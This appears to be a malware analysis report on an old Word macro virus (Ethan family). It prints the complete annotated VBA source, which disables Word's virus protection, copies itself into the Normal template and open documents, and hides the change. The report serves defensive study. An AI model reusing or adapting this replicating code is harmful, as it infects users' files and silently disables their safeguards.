Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 94307bb616cd2305…

MALICIOUS

Office (OLE)

Size: 29.0 KB · Created: 2001-06-05 23:40:00 (OLE summary-information timestamp, author-controlled and not independently verifiable) · Authoring application: Microsoft Word 8.0 (Word 97) · First seen: 2012-06-14
MD5: 1551d4de4eb3e5b831edac2a12f24ad6 SHA-1: 26b858fd05ca2c88c38579f82b072ae85042b596 SHA-256: 94307bb616cd23053e247518a43ffed11f728eed59c5488a5c0285a59396150a
Risk score: 80

Malware Insights

MITRE ATT&CK
T1566.001 Phishing: Spearphishing Attachment; T1059.005 Command and Scripting Interpreter: Visual Basic; T1137.001 Office Application Startup: Office Template Macros (inferred from the Normal template infection in the extracted macro, see summary)

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Ethan-20. The extracted VBA module is a self-replicating Word macro virus, not a downloader: the listing contains no network, shell, or file-download calls. On `Document_Close` it disables Word's safeguards (`Options.VirusProtection`, `SaveNormalPrompt`, `ConfirmConversions`, and the Cancel key), writes its own module source to `Normal.dat` in the Normal template's folder (and line 2, `Version = 0.24`, to `License.dat`), then picks an infection target: if the first module of the Normal template does not already begin with `Private Sub Document_Close()` it inserts the source there (global template infection, ATT&CK T1137.001); otherwise it infects the first module of the document being closed and re-saves it under its existing name. Both temporary files are deleted afterwards and the document's `Saved` flag is restored so the modification is not reported. The payloads are nuisance-level: a 30% chance of a message box ("You are lamer? Press OK to confirm") after an infection, and a 5% chance of inserting the contents of `License.dat` into the document body and saving it. The comments and the `Document_New` message are Russian CP1251 text rendered as mojibake, consistent with the Word 97-era origin indicated by the metadata. Note for analysts: the replication reads and writes `VBProject` members, which current Office versions block unless "Trust access to the VBA project object model" is enabled; with that access denied the calls fail and are swallowed by `On Error Resume Next`, so the sample is far less effective on modern hosts than its original targets.

Heuristics 2

  • ClamAV: Doc.Trojan.Ethan-20 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ethan-20
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8149 bytes
SHA-256: f718e6aad69573767a2a1691cafcaff79db46dad2a370aaff107cd281150c281
Preview script
First 1,000 lines of the extracted script (the decoded VBA source, followed — as `'` comment lines — by the analyzer's p-code disassembly of the same module)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba. The code lives in the document's
' "ThisDocument" class module, so its Document_* event handlers run
' automatically. VB_Base = "1Normal.ThisDocument" together with
' VB_TemplateDerived = True presumably means the module was derived from the
' Normal template -- consistent with the Normal template infection performed
' by Document_Close below (verify against the original OLE streams).
' Infection routine: fires whenever the document is closed. Every statement
' runs under "On Error Resume Next", so any failure (for example the
' VBProject object model being inaccessible) is skipped silently and the
' rest of the routine still executes.
Private Sub Document_Close()
' Marker line: assigns a Variant named "Version". As line 2 of the module it
' is what the "Version" prefix check below looks for and what is copied into
' License.dat.
Version = 0.24
' Original comment, CP1251 Russian shown as CP1250 mojibake:
' "Почему ты не сказал Бе-Бе ???" -- "Why didn't you say Be-Be ???"
' Ďî÷ĺěó ňű íĺ ńęŕçŕë Áĺ-Áĺ ???
    On Error Resume Next
    ' Remember the document's Saved flag so it can be restored at the end,
    ' hiding that the document was modified.
    s = ActiveDocument.Saved
    ' Not -1 evaluates to 0: disables the Cancel key (Ctrl+Break) so the user
    ' cannot interrupt the macro while it runs.
    Application.EnableCancelKey = Not -1
    ' Switch off Word's macro virus warning, the "save changes to Normal?"
    ' prompt and conversion confirmations so the template infection and the
    ' re-save below produce no visible prompts.
    With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
    Randomize
        ' Stage 1: dump this module's own source to two temporary files next
        ' to the Normal template. Normal.dat receives every line; License.dat
        ' receives only line 2 ("Version = 0.24"). MacroContainer is the
        ' document or template in which this code is currently running.
        Open NormalTemplate.Path & "\Normal.dat" For Output As #1
        Open NormalTemplate.Path & "\License.dat" For Output As #2
        For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
            a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
            Print #1, a
            If i = 2 Then Print #2, a
        Next i
        Close #1
        Close #2
    ' Stage 2: choose the infection target. The global Normal template is
    ' preferred, then the active document. A module whose first line is
    ' already "Private Sub Document_Close()" is treated as infected.
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
        ' Normal not yet infected. The extra "Version" test on line 2 is a
        ' second marker check; if it matches, no target is set at all.
        If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 7) <> "Version" Then
            Set t = NormalTemplate.VBProject.VBComponents.Item(1)
        End If
    ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
        ' Normal is already infected: infect the document being closed.
        Set t = ActiveDocument.VBProject.VBComponents.Item(1)
    Else
        t = ""
    End If
    ' NOTE(review): when t was never assigned it is Empty; Empty <> "" is
    ' False, so the infection branch is skipped in that case too.
    If t <> "" Then
        ' Stage 3: copy the dumped source line by line into the top of the
        ' target module (InsertLines at positions 1, 2, 3, ...). LOF(1) = 0
        ' means Stage 1 produced nothing (e.g. the VBProject read failed), so
        ' nothing is inserted.
        Open NormalTemplate.Path & "\Normal.dat" For Input As #1
        If LOF(1) = 0 Then GoTo q
        i = 1
        Do While Not EOF(1)
            Line Input #1, a
            t.CodeModule.InsertLines i, a
            i = i + 1
        Loop
q:      Close #1
        ' Persist the infected document to disk under its existing name, unless
        ' its name starts with "Document" (presumably an unsaved new document).
        If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
        ' 30% chance of a taunting message box after an infection.
        If Rnd < 0.3 Then
            a = MsgBox("You are lamer? Press OK to confirm", vbOKOnly, "Windows NT")
        End If
    End If
    ' Always remove the full-source temp file; then, with 5% probability,
    ' insert the contents of License.dat ("Version = 0.24") into the body of
    ' the document and save it.
    Kill NormalTemplate.Path & "\Normal.dat"
    If Rnd < 0.05 Then
        ActiveDocument.Content.InsertFile NormalTemplate.Path & "\License.dat"
        ActiveDocument.Save
    End If
    ' Restore the Saved flag captured at the top so Word does not report the
    ' document as modified, then remove the second temp file.
    If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
    Kill NormalTemplate.Path & "\License.dat"
End Sub

Private Sub Document_New()
    ' Runs when a new document is created from the infected template. Its
    ' only effect is a question-icon message box; the caption string is
    ' CP1251 Russian shown as mojibake: "И зачем тебе этот пустой файл ???"
    ' -- "And what do you need this empty file for ???". The button result
    ' is not used.
    Dim reply As VbMsgBoxResult
    reply = MsgBox("Č çŕ÷ĺě ňĺáĺ ýňîň ďóńňîé ôŕéë ???", vbQuestion, "WindowsNT")
End Sub

' Processing file: /opt/analyzer/scan_staging/f6cdce099e65404a888503a231d78320.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4049 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	LitR8 0x1EB8 0xEB85 0xB851 0x3FCE 
' 	St Version 
' Line #2:
' 	QuoteRem 0x0000 0x001E " Ďî÷ĺěó ňű íĺ ńęŕçŕë Áĺ-Áĺ ???"
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	St s 
' Line #5:
' 	LitDI2 0x0001 
' 	UMi 
' 	Not 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #6:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' 	BoS 0x0000 
' 	EndWith 
' Line #7:
' 	ArgsCall Read 0x0000 
' Line #8:
' 	Ld NormalTemplate 
' 	MemLd Path 
' 	LitStr 0x000B "\Normal.dat"
' 	Concat 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #9:
' 	Ld NormalTemplate 
' 	MemLd Path 
' 	LitStr 0x000C "\License.dat"
' 	Concat 
' 	LitDI2 0x0002 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #10:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' Line #11:
' 	Ld i 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 

... (truncated)